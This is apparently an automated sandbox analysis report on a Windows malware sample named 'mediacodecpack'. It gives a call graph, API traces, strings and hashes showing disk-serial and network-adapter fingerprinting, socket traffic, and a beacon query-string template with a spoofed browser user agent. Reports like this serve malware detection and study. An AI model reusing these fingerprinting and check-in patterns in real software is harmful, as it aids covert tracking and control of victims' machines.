calls 61547->61548 61551 2d0c131 61548->61551 61549 2d0c21f 61549->61416 61550 2d02db5 73 API calls 61550->61551 61551->61549 61551->61550 61553 2d07409 WSASetLastError shutdown 61552->61553 61554 2d073f9 61552->61554 61556 2d0950d 69 API calls 61553->61556 61555 2d0fb20 Mailbox 68 API calls 61554->61555 61557 2d06b38 61555->61557 61558 2d07426 61556->61558 61566 2d033b2 86 API calls 61557->61566 61558->61557 61559 2d0fb20 Mailbox 68 API calls 61558->61559 61559->61557 61560->61425 61561->61425 61562->61425 61563->61424 61564->61442 61565->61443 61566->61410 61567->61389 61568->61452 61569->61454 61570->61450 61572 2d0d00e __EH_prolog 61571->61572 61573 2d127c5 _Allocate 60 API calls 61572->61573 61574 2d0d025 61573->61574 61574->61458 61576 2d0513d 61575->61576 61577 2d0fb49 61575->61577 61576->61463 61578 2d123b4 __cinit 68 API calls 61577->61578 61578->61576 61580 2d0fb20 Mailbox 68 API calls 61579->61580 61583 2d0bef7 61580->61583 61581 2d0c006 61581->61471 61583->61581 61584 2d02b95 61583->61584 61585 2d02bb1 61584->61585 61586 2d02bc7 61584->61586 61587 2d0fb20 Mailbox 68 API calls 61585->61587 61589 2d02bd2 61586->61589 61598 2d02bdf 61586->61598 61592 2d02bb6 61587->61592 61588 2d02be2 WSASetLastError WSARecv 61599 2d0950d 61588->61599 61591 2d0fb20 Mailbox 68 API calls 61589->61591 61591->61592 61592->61583 61593 2d02d22 61602 2d01996 68 API calls __cinit 61593->61602 61595 2d02cbc WSASetLastError select 61596 2d0950d 69 API calls 61595->61596 61596->61598 61597 2d0fb20 68 API calls Mailbox 61597->61598 61598->61588 61598->61592 61598->61593 61598->61595 61598->61597 61600 2d0fb20 Mailbox 68 API calls 61599->61600 61601 2d09519 WSAGetLastError 61600->61601 61601->61598 61602->61592 61603->61491 61612 2d123c9 61604->61612 61607 2d11124 61607->61493 61608 2d1114d ResumeThread 61608->61493 61609 2d11146 CloseHandle 61609->61608 61610->61496 61613 2d123d7 61612->61613 61614 2d123eb 61612->61614 61636 2d14acb 59 API calls __getptd_noexit 61613->61636 61616 
2d1762a __calloc_crt 59 API calls 61614->61616 61618 2d123f8 61616->61618 61617 2d123dc 61637 2d13b65 9 API calls __fclose_nolock 61617->61637 61620 2d12449 61618->61620 61631 2d148ca 61618->61631 61621 2d11f84 _free 59 API calls 61620->61621 61623 2d1244f 61621->61623 61628 2d1111b 61623->61628 61638 2d14aaa 59 API calls 3 library calls 61623->61638 61625 2d14951 __initptd 59 API calls 61626 2d1240e CreateThread 61625->61626 61626->61628 61630 2d12441 GetLastError 61626->61630 61655 2d12529 61626->61655 61628->61607 61628->61608 61628->61609 61630->61620 61639 2d148e2 GetLastError 61631->61639 61633 2d148d0 61634 2d12405 61633->61634 61653 2d16ffd 59 API calls 3 library calls 61633->61653 61634->61625 61636->61617 61637->61628 61638->61628 61640 2d17d8b __freeptd TlsGetValue 61639->61640 61641 2d148f7 61640->61641 61642 2d14945 SetLastError 61641->61642 61643 2d1762a __calloc_crt 56 API calls 61641->61643 61642->61633 61644 2d1490a 61643->61644 61644->61642 61654 2d17daa TlsSetValue 61644->61654 61646 2d1491e 61647 2d14924 61646->61647 61648 2d1493c 61646->61648 61649 2d14951 __initptd 56 API calls 61647->61649 61650 2d11f84 _free 56 API calls 61648->61650 61652 2d1492c GetCurrentThreadId 61649->61652 61651 2d14942 61650->61651 61651->61642 61652->61642 61654->61646 61656 2d12532 __threadstartex@4 61655->61656 61657 2d17d8b __freeptd TlsGetValue 61656->61657 61658 2d12538 61657->61658 61659 2d1256b 61658->61659 61660 2d1253f __threadstartex@4 61658->61660 61688 2d1475f 59 API calls 6 library calls 61659->61688 61687 2d17daa TlsSetValue 61660->61687 61663 2d1254e 61664 2d12561 GetCurrentThreadId 61663->61664 61665 2d12554 GetLastError RtlExitUserThread 61663->61665 61667 2d12586 ___crtIsPackagedApp 61664->61667 61665->61664 61666 2d1259a 61677 2d12462 61666->61677 61667->61666 61671 2d124d1 61667->61671 61672 2d12513 RtlDecodePointer 61671->61672 61673 2d124da LoadLibraryExW GetProcAddress 61671->61673 61676 2d12523 61672->61676 61674 2d124fd RtlEncodePointer 
61673->61674 61675 2d124fc 61673->61675 61674->61672 61675->61666 61676->61666 61678 2d1246e CallCatchBlock 61677->61678 61679 2d148ca __CreateFrameInfo 59 API calls 61678->61679 61680 2d12473 61679->61680 61689 2d11170 61680->61689 61683 2d12483 61684 2d17954 __XcptFilter 59 API calls 61683->61684 61685 2d12494 61684->61685 61687->61663 61688->61667 61707 2d10620 61689->61707 61692 2d111c0 61729 2d0cdb8 61692->61729 61693 2d111b8 TlsSetValue 61693->61692 61698 2d124a3 61699 2d148e2 __getptd_noexit 59 API calls 61698->61699 61700 2d124ac 61699->61700 61701 2d124c7 RtlExitUserThread 61700->61701 61702 2d124c0 61700->61702 61703 2d124bb 61700->61703 61845 2d14894 59 API calls 2 library calls 61702->61845 61844 2d125a6 LoadLibraryExW GetProcAddress RtlEncodePointer RtlDecodePointer 61703->61844 61706 2d124c6 61706->61701 61709 2d10684 61707->61709 61708 2d10700 61710 2d10716 61708->61710 61712 2d10713 CloseHandle 61708->61712 61709->61708 61711 2d1069c 61709->61711 61715 2d107ac WaitForSingleObject 61709->61715 61724 2d10780 CreateEventA 61709->61724 61727 2d1079e CloseHandle 61709->61727 61754 2d10c20 GetCurrentProcessId 61709->61754 61745 2d131bb 61710->61745 61713 2d106de ResetEvent 61711->61713 61716 2d106b5 OpenEventA 61711->61716 61752 2d10c20 GetCurrentProcessId 61711->61752 61712->61710 61718 2d106e5 61713->61718 61715->61709 61720 2d106d7 61716->61720 61721 2d106cf 61716->61721 61717 2d1072e 61717->61692 61717->61693 61753 2d10860 CreateEventA CloseHandle SetEvent GetCurrentProcessId 61718->61753 61720->61713 61720->61718 61721->61720 61723 2d106d4 CloseHandle 61721->61723 61722 2d106b2 61722->61716 61723->61720 61724->61709 61727->61709 61728 2d106fd 61728->61708 61730 2d0cdda 61729->61730 61756 2d04d86 61730->61756 61731 2d0cddd 61733 2d10f40 61731->61733 61734 2d10f71 Mailbox 61733->61734 61735 2d10f79 TlsGetValue 61733->61735 61736 2d10fed 61734->61736 61738 2d10fc9 61734->61738 61741 2d11059 GetProcessHeap HeapFree 61734->61741 61744 2d1104b 
GetProcessHeap HeapFree 61734->61744 61735->61734 61737 2d11016 61736->61737 61739 2d1100e GetProcessHeap HeapFree 61736->61739 61737->61698 61740 2d10620 17 API calls 61738->61740 61739->61737 61742 2d10fd8 61740->61742 61741->61734 61742->61736 61743 2d10fe5 TlsSetValue 61742->61743 61743->61736 61744->61741 61746 2d131c3 61745->61746 61747 2d131c5 IsProcessorFeaturePresent 61745->61747 61746->61717 61749 2d1814f 61747->61749 61755 2d180fe 5 API calls 2 library calls 61749->61755 61751 2d18232 61751->61717 61752->61722 61753->61728 61754->61709 61755->61751 61757 2d04d90 __EH_prolog 61756->61757 61758 2d0fb20 Mailbox 68 API calls 61757->61758 61759 2d04da6 RtlEnterCriticalSection RtlLeaveCriticalSection 61758->61759 61760 2d050d4 shared_ptr 61759->61760 61773 2d04dd1 std::bad_exception::bad_exception 61759->61773 61760->61731 61762 2d050a1 RtlEnterCriticalSection RtlLeaveCriticalSection 61763 2d050b3 RtlEnterCriticalSection RtlLeaveCriticalSection 61762->61763 61763->61760 61763->61773 61764 2d09729 73 API calls 61764->61773 61766 2d04e8d RtlEnterCriticalSection RtlLeaveCriticalSection 61767 2d04e9f RtlEnterCriticalSection RtlLeaveCriticalSection 61766->61767 61767->61773 61768 2d0bedd 73 API calls 61768->61773 61773->61762 61773->61763 61773->61764 61773->61766 61773->61767 61773->61768 61776 2d04bed 61773->61776 61800 2d06d28 60 API calls 61773->61800 61801 2d0c00f 60 API calls 2 library calls 61773->61801 61802 2d06d02 60 API calls std::bad_exception::bad_exception 61773->61802 61803 2d099b6 60 API calls 2 library calls 61773->61803 61804 2d09a8e 210 API calls 3 library calls 61773->61804 61805 2d10900 GetProcessHeap HeapFree 61773->61805 61806 2d04100 GetProcessHeap HeapFree 61773->61806 61777 2d04bf7 __EH_prolog 61776->61777 61778 2d01ba7 209 API calls 61777->61778 61779 2d04c31 61778->61779 61807 2d03a94 61779->61807 61781 2d04c3c 61782 2d03a94 60 API calls 61781->61782 61783 2d04c56 61782->61783 61810 2d075d6 61783->61810 61788 2d0fb20 Mailbox 68 API calls 
61789 2d04cb8 61788->61789 61835 2d0b294 61789->61835 61791 2d04ce1 InterlockedExchange 61839 2d02995 95 API calls Mailbox 61791->61839 61793 2d04d3c 61843 2d0761f 75 API calls 2 library calls 61793->61843 61798 2d04d57 shared_ptr 61798->61773 61799 2d04d06 61799->61793 61840 2d07592 76 API calls Mailbox 61799->61840 61841 2d072fc 82 API calls Mailbox 61799->61841 61842 2d02995 95 API calls Mailbox 61799->61842 61800->61773 61801->61773 61802->61773 61803->61773 61804->61773 61805->61773 61806->61773 61808 2d039ee 60 API calls 61807->61808 61809 2d03ab5 61808->61809 61809->61781 61811 2d0fb20 Mailbox 68 API calls 61810->61811 61812 2d075ec 61811->61812 61813 2d08a25 77 API calls 61812->61813 61814 2d07606 61813->61814 61815 2d01712 60 API calls 61814->61815 61816 2d04c8b 61815->61816 61817 2d0d0fc 61816->61817 61818 2d0d106 __EH_prolog 61817->61818 61819 2d01a01 61 API calls 61818->61819 61820 2d0d11d 61819->61820 61822 2d0fb20 Mailbox 68 API calls 61820->61822 61823 2d0d15a InterlockedExchangeAdd 61820->61823 61822->61823 61824 2d0d195 RtlEnterCriticalSection 61823->61824 61825 2d0d18a 61823->61825 61827 2d06f5f 60 API calls 61824->61827 61826 2d01ec7 InterlockedIncrement PostQueuedCompletionStatus RtlEnterCriticalSection InterlockedExchange RtlLeaveCriticalSection 61825->61826 61828 2d0d193 61826->61828 61829 2d0d1bb InterlockedIncrement 61827->61829 61833 2d0d856 TlsGetValue 61828->61833 61830 2d0d1d2 RtlLeaveCriticalSection 61829->61830 61831 2d0d1cb 61829->61831 61830->61828 61832 2d027f3 SetWaitableTimer 61831->61832 61832->61830 61834 2d04ca4 61833->61834 61834->61788 61836 2d0b2a7 61835->61836 61837 2d0b2d0 61836->61837 61838 2d0d9c5 83 API calls 61836->61838 61837->61791 61838->61837 61839->61799 61840->61799 61841->61799 61842->61799 61843->61798 61844->61702 61845->61706 61846->61508 61847->61511 61848->61509 61849->61511 61850->61515 61852 2d0d33e __EH_prolog 61851->61852 61853 2d127c5 _Allocate 60 API calls 61852->61853 61854 2d0d347 61853->61854 61855 
2d01bfa RtlEnterCriticalSection 61854->61855 61857 2d0d555 61854->61857 61855->61520 61858 2d0d55f __EH_prolog 61857->61858 61861 2d026db RtlEnterCriticalSection 61858->61861 61860 2d0d5b5 61860->61855 61862 2d02728 CreateWaitableTimerA 61861->61862 61863 2d0277e 61861->61863 61864 2d02738 GetLastError 61862->61864 61865 2d0275b SetWaitableTimer 61862->61865 61866 2d027d5 RtlLeaveCriticalSection 61863->61866 61868 2d127c5 _Allocate 60 API calls 61863->61868 61867 2d0fb20 Mailbox 68 API calls 61864->61867 61865->61863 61866->61860 61869 2d02745 61867->61869 61870 2d0278a 61868->61870 61905 2d01712 61869->61905 61872 2d127c5 _Allocate 60 API calls 61870->61872 61873 2d027c8 61870->61873 61874 2d027a9 61872->61874 61911 2d06e07 CloseHandle 61873->61911 61877 2d01cf8 CreateEventA 61874->61877 61878 2d01d52 CreateEventA 61877->61878 61879 2d01d23 GetLastError 61877->61879 61880 2d01d6b GetLastError 61878->61880 61897 2d01d96 61878->61897 61882 2d01d33 61879->61882 61883 2d01d7b 61880->61883 61881 2d123c9 __beginthreadex 201 API calls 61884 2d01db6 61881->61884 61885 2d0fb20 Mailbox 68 API calls 61882->61885 61886 2d0fb20 Mailbox 68 API calls 61883->61886 61887 2d01dc6 GetLastError 61884->61887 61888 2d01e0d 61884->61888 61889 2d01d3c 61885->61889 61890 2d01d84 61886->61890 61895 2d01dd8 61887->61895 61891 2d01e11 WaitForSingleObject CloseHandle 61888->61891 61892 2d01e1d 61888->61892 61893 2d01712 60 API calls 61889->61893 61894 2d01712 60 API calls 61890->61894 61891->61892 61892->61873 61896 2d01d4e 61893->61896 61894->61897 61898 2d01ddc CloseHandle 61895->61898 61899 2d01ddf 61895->61899 61896->61878 61897->61881 61898->61899 61900 2d01de9 CloseHandle 61899->61900 61901 2d01dee 61899->61901 61900->61901 61902 2d0fb20 Mailbox 68 API calls 61901->61902 61903 2d01dfb 61902->61903 61904 2d01712 60 API calls 61903->61904 61904->61888 61906 2d0171c __EH_prolog 61905->61906 61907 2d0173e 61906->61907 61912 2d01815 59 API calls std::exception::exception 61906->61912 
61907->61865 61909 2d01732 61913 2d094a6 60 API calls 2 library calls 61909->61913 61911->61866 61912->61909 61925 2d030ae WSASetLastError 61914->61925 61917 2d030ae 71 API calls 61918 2d03c90 61917->61918 61919 2d016ae 61918->61919 61920 2d016b8 __EH_prolog 61919->61920 61921 2d01701 61920->61921 61941 2d114e3 59 API calls std::exception::_Copy_str 61920->61941 61921->61529 61923 2d016dc 61942 2d094a6 60 API calls 2 library calls 61923->61942 61926 2d030ec WSAStringToAddressA 61925->61926 61927 2d030ce 61925->61927 61928 2d0950d 69 API calls 61926->61928 61927->61926 61929 2d030d3 61927->61929 61930 2d03114 61928->61930 61931 2d0fb20 Mailbox 68 API calls 61929->61931 61932 2d03154 61930->61932 61938 2d0311e _memcmp 61930->61938 61940 2d030d8 61931->61940 61933 2d03135 61932->61933 61935 2d0fb20 Mailbox 68 API calls 61932->61935 61934 2d03193 61933->61934 61936 2d0fb20 Mailbox 68 API calls 61933->61936 61939 2d0fb20 Mailbox 68 API calls 61934->61939 61934->61940 61935->61933 61936->61934 61937 2d0fb20 Mailbox 68 API calls 61937->61933 61938->61933 61938->61937 61939->61940 61940->61917 61940->61918 61941->61923 61943->61535 61944->61534 61966 2d0353e 61945->61966 61949 2d02ae8 WSASetLastError connect 61948->61949 61950 2d02ad8 61948->61950 61951 2d0950d 69 API calls 61949->61951 61952 2d0fb20 Mailbox 68 API calls 61950->61952 61954 2d02b07 61951->61954 61953 2d02add 61952->61953 61956 2d0fb20 Mailbox 68 API calls 61953->61956 61954->61953 61955 2d0fb20 Mailbox 68 API calls 61954->61955 61955->61953 61957 2d02b1b 61956->61957 61959 2d0fb20 Mailbox 68 API calls 61957->61959 61961 2d02b38 61957->61961 61959->61961 61960 2d02b59 61962 2d02b87 61960->61962 62000 2d02fb4 71 API calls Mailbox 61960->62000 61961->61962 61999 2d03027 71 API calls Mailbox 61961->61999 61962->61541 61964 2d02b7a 61964->61962 61965 2d0fb20 Mailbox 68 API calls 61964->61965 61965->61962 61967 2d03548 __EH_prolog 61966->61967 61968 2d03576 61967->61968 61969 2d03557 61967->61969 61988 2d02edd 
WSASetLastError WSASocketA 61968->61988 61996 2d01996 68 API calls __cinit 61969->61996 61973 2d035ad CreateIoCompletionPort 61974 2d035c5 GetLastError 61973->61974 61975 2d035db 61973->61975 61976 2d0fb20 Mailbox 68 API calls 61974->61976 61977 2d0fb20 Mailbox 68 API calls 61975->61977 61978 2d035d2 61976->61978 61977->61978 61979 2d03626 61978->61979 61980 2d035ef 61978->61980 61998 2d0cef7 60 API calls 2 library calls 61979->61998 61981 2d0fb20 Mailbox 68 API calls 61980->61981 61982 2d03608 61981->61982 61997 2d029ee 76 API calls Mailbox 61982->61997 61985 2d03659 61986 2d0fb20 Mailbox 68 API calls 61985->61986 61987 2d0355f 61986->61987 61987->61537 61989 2d0fb20 Mailbox 68 API calls 61988->61989 61990 2d02f0a WSAGetLastError 61989->61990 61991 2d02f21 61990->61991 61992 2d02f41 61990->61992 61993 2d02f27 setsockopt 61991->61993 61994 2d02f3c 61991->61994 61992->61973 61992->61987 61993->61994 61995 2d0fb20 Mailbox 68 API calls 61994->61995 61995->61992 61996->61987 61997->61987 61998->61985 61999->61960 62000->61964 62002 2d02de4 62001->62002 62003 2d02dca 62001->62003 62004 2d02dfc 62002->62004 62006 2d02def 62002->62006 62005 2d0fb20 Mailbox 68 API calls 62003->62005 62015 2d02d39 WSASetLastError WSASend 62004->62015 62009 2d02dcf 62005->62009 62008 2d0fb20 Mailbox 68 API calls 62006->62008 62008->62009 62009->61544 62010 2d02e54 WSASetLastError select 62011 2d0950d 69 API calls 62010->62011 62013 2d02e0c 62011->62013 62012 2d0fb20 68 API calls Mailbox 62012->62013 62013->62009 62013->62010 62013->62012 62014 2d02d39 71 API calls 62013->62014 62014->62013 62016 2d0950d 69 API calls 62015->62016 62017 2d02d6e 62016->62017 62018 2d02d82 62017->62018 62019 2d02d75 62017->62019 62021 2d02d7a 62018->62021 62022 2d0fb20 Mailbox 68 API calls 62018->62022 62020 2d0fb20 Mailbox 68 API calls 62019->62020 62020->62021 62023 2d02d9c 62021->62023 62024 2d0fb20 Mailbox 68 API calls 62021->62024 62022->62021 62023->62013 62024->62023

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • RtlInitializeCriticalSection.NTDLL(02D34FD0), ref: 02D05E92
                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02D05EA9
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02D05EB2
                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02D05EC1
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02D05EC4
                                                                                • GetTickCount.KERNEL32 ref: 02D05ED8
                                                                                  • Part of subcall function 02D059FA: _malloc.LIBCMT ref: 02D05A08
                                                                                • GetVersionExA.KERNEL32(02D34E20), ref: 02D05F05
                                                                                • _memset.LIBCMT ref: 02D05F24
                                                                                • _malloc.LIBCMT ref: 02D05F31
                                                                                  • Part of subcall function 02D11FBC: __FF_MSGBANNER.LIBCMT ref: 02D11FD3
                                                                                  • Part of subcall function 02D11FBC: __NMSG_WRITE.LIBCMT ref: 02D11FDA
                                                                                  • Part of subcall function 02D11FBC: RtlAllocateHeap.NTDLL(009D0000,00000000,00000001), ref: 02D11FFF
                                                                                • _malloc.LIBCMT ref: 02D05F41
                                                                                • _malloc.LIBCMT ref: 02D05F4C
                                                                                • _malloc.LIBCMT ref: 02D05F57
                                                                                • _malloc.LIBCMT ref: 02D05F62
                                                                                • _malloc.LIBCMT ref: 02D05F6D
                                                                                • _malloc.LIBCMT ref: 02D05F78
                                                                                • _malloc.LIBCMT ref: 02D05F84
                                                                                • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02D05F9B
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02D05FA4
                                                                                • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D05FB0
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02D05FB3
                                                                                • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D05FBE
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02D05FC1
                                                                                • _memset.LIBCMT ref: 02D05FD1
                                                                                • _memset.LIBCMT ref: 02D05FDD
                                                                                • _memset.LIBCMT ref: 02D05FEA
                                                                                • RtlEnterCriticalSection.NTDLL(02D34FD0), ref: 02D05FF8
                                                                                • RtlLeaveCriticalSection.NTDLL(02D34FD0), ref: 02D06005
                                                                                • _malloc.LIBCMT ref: 02D06026
                                                                                • _malloc.LIBCMT ref: 02D06034
                                                                                • _malloc.LIBCMT ref: 02D0603B
                                                                                • _malloc.LIBCMT ref: 02D0605C
                                                                                • QueryPerformanceCounter.KERNEL32(00000200), ref: 02D06068
                                                                                • Sleep.KERNELBASE(00000000), ref: 02D06076
                                                                                • _malloc.LIBCMT ref: 02D06082
                                                                                • _malloc.LIBCMT ref: 02D06092
                                                                                • _memset.LIBCMT ref: 02D060A7
                                                                                • _memset.LIBCMT ref: 02D060B7
                                                                                • Sleep.KERNELBASE(0000EA60), ref: 02D06104
                                                                                • RtlEnterCriticalSection.NTDLL(02D34FD0), ref: 02D0610F
                                                                                • RtlLeaveCriticalSection.NTDLL(02D34FD0), ref: 02D06120
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _malloc$Heap$_memset$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                                • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$Q!V$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat
                                                                                • API String ID: 1856495841-38596970
                                                                                • Opcode ID: cd3d6d413185bfc2559cf95eb840017fb0f034a8840cafe3229b7dd0d631c000
                                                                                • Instruction ID: 3f4add99502ae2c357e21d11ed5e5eb67172ed09936b25c9802766d32623d203
                                                                                • Opcode Fuzzy Hash: cd3d6d413185bfc2559cf95eb840017fb0f034a8840cafe3229b7dd0d631c000
                                                                                • Instruction Fuzzy Hash: 9171B0B2D48340ABE311AB34BC44B5B7BE8EF55314F15091DF68897381DBB88D18CBA6

                                                                                Control-flow Graph

                                                                                control_flow_graph 462 2d0e9ab-2d0e9ce LoadLibraryA 463 2d0e9d4-2d0e9e2 GetProcAddress 462->463 464 2d0ea8e-2d0ea95 462->464 465 2d0ea87-2d0ea88 FreeLibrary 463->465 466 2d0e9e8-2d0e9f8 463->466 465->464 467 2d0e9fa-2d0ea06 GetAdaptersInfo 466->467 468 2d0ea08 467->468 469 2d0ea3e-2d0ea46 467->469 470 2d0ea0a-2d0ea11 468->470 471 2d0ea48-2d0ea4e call 2d126df 469->471 472 2d0ea4f-2d0ea54 469->472 476 2d0ea13-2d0ea17 470->476 477 2d0ea1b-2d0ea23 470->477 471->472 474 2d0ea82-2d0ea86 472->474 475 2d0ea56-2d0ea59 472->475 474->465 475->474 479 2d0ea5b-2d0ea60 475->479 476->470 480 2d0ea19 476->480 481 2d0ea26-2d0ea2b 477->481 482 2d0ea62-2d0ea6a 479->482 483 2d0ea6d-2d0ea78 call 2d127c5 479->483 480->469 481->481 484 2d0ea2d-2d0ea3a call 2d0e6fa 481->484 482->483 483->474 489 2d0ea7a-2d0ea7d 483->489 484->469 489->467
                                                                                APIs
                                                                                • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 02D0E9C1
                                                                                • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02D0E9DA
                                                                                • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02D0E9FF
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 02D0EA88
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                • API String ID: 514930453-3114217049
                                                                                • Opcode ID: 45c82d720d595a180787ea9344a348b92a94567ea30c64cd9009d4faaab84f29
                                                                                • Instruction ID: 1b600af507e52a90fcef6f1882a587a9ebcc0f2cfe00893113599ba6840a1aab
                                                                                • Opcode Fuzzy Hash: 45c82d720d595a180787ea9344a348b92a94567ea30c64cd9009d4faaab84f29
                                                                                • Instruction Fuzzy Hash: 3321E671E082599BDB24DBA9D8C4BEEBBB9FF09314F1444A9E444E7391D7308D45CBA0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D02BE4
                                                                                • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02D02C07
                                                                                  • Part of subcall function 02D0950D: WSAGetLastError.WS2_32(00000000,?,?,02D02A51), ref: 02D0951B
                                                                                • WSASetLastError.WS2_32 ref: 02D02CD3
                                                                                • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02D02CE7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$Recvselect
                                                                                • String ID: 3'
                                                                                • API String ID: 886190287-280543908
                                                                                • Opcode ID: 002e7845789f75ff46b4857c96f2b7a0474eeb3e36d1847952f6fffd39b84fd2
                                                                                • Instruction ID: 112cccace94e91c848df00d70dacf7119489f61d8c295644d7a9147d9af0259e
                                                                                • Opcode Fuzzy Hash: 002e7845789f75ff46b4857c96f2b7a0474eeb3e36d1847952f6fffd39b84fd2
                                                                                • Instruction Fuzzy Hash: 3E413AB19063019FD720AF64D89876ABBE9AF84354F10491EA895877E0EB70DD44CFA1

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02D0E8C6
                                                                                • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02D0E904
                                                                                • GetLastError.KERNEL32 ref: 02D0E965
                                                                                • CloseHandle.KERNELBASE(?), ref: 02D0E99C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                • String ID: \\.\PhysicalDrive0
                                                                                • API String ID: 4026078076-1180397377
                                                                                • Opcode ID: 1da1384dbc2f6579bb8c7bbf8a85bdd6dc78ff93c0091f5a0068a347440a6f20
                                                                                • Instruction ID: f69358f3041359e50ad7c496cf577b9554a6050dd4d1aad8d7ae6f0c5c010f48
                                                                                • Opcode Fuzzy Hash: 1da1384dbc2f6579bb8c7bbf8a85bdd6dc78ff93c0091f5a0068a347440a6f20
                                                                                • Instruction Fuzzy Hash: 2331A571D00225EBDB24CF95E884BAEBB78EF45714F20496EE505A7390D7705E04CBA0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • RtlInitializeCriticalSection.NTDLL(02D34FD0), ref: 02D05E92
                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02D05EA9
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02D05EB2
                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02D05EC1
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02D05EC4
                                                                                • GetTickCount.KERNEL32 ref: 02D05ED8
                                                                                • GetVersionExA.KERNEL32(02D34E20), ref: 02D05F05
                                                                                • _memset.LIBCMT ref: 02D05F24
                                                                                • _malloc.LIBCMT ref: 02D05F31
                                                                                • _malloc.LIBCMT ref: 02D05F41
                                                                                • _malloc.LIBCMT ref: 02D05F4C
                                                                                • _malloc.LIBCMT ref: 02D05F57
                                                                                • _malloc.LIBCMT ref: 02D05F62
                                                                                • _malloc.LIBCMT ref: 02D05F6D
                                                                                • _malloc.LIBCMT ref: 02D05F78
                                                                                • _malloc.LIBCMT ref: 02D05F84
                                                                                • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02D05F9B
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02D05FA4
                                                                                • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D05FB0
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02D05FB3
                                                                                • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D05FBE
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02D05FC1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _malloc$Heap$AllocateProcess$AddressHandleModuleProc$CountCriticalInitializeSectionTickVersion_memset
                                                                                • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$Q!V$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat
                                                                                • API String ID: 3007647348-38596970
                                                                                • Opcode ID: cf09fda83790b39788aed6b35a50506515b38a7240b497aa0992d3ae5535322e
                                                                                • Instruction ID: 1c3b84984da3b097bbb5cd9001afc56006854e97e27a9c11a7df92c2a20bc423
                                                                                • Opcode Fuzzy Hash: cf09fda83790b39788aed6b35a50506515b38a7240b497aa0992d3ae5535322e
                                                                                • Instruction Fuzzy Hash: 89A1F372948340ABD311AF34B884B5BBBE4EF5A314F55085EE68897381DB748C19CBA6

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • Sleep.KERNELBASE(0000EA60), ref: 02D06104
                                                                                • RtlEnterCriticalSection.NTDLL(02D34FD0), ref: 02D0610F
